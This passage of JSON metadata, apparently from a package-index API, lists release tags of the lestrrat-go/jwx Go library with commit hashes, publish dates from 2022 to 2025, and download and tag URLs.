6T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/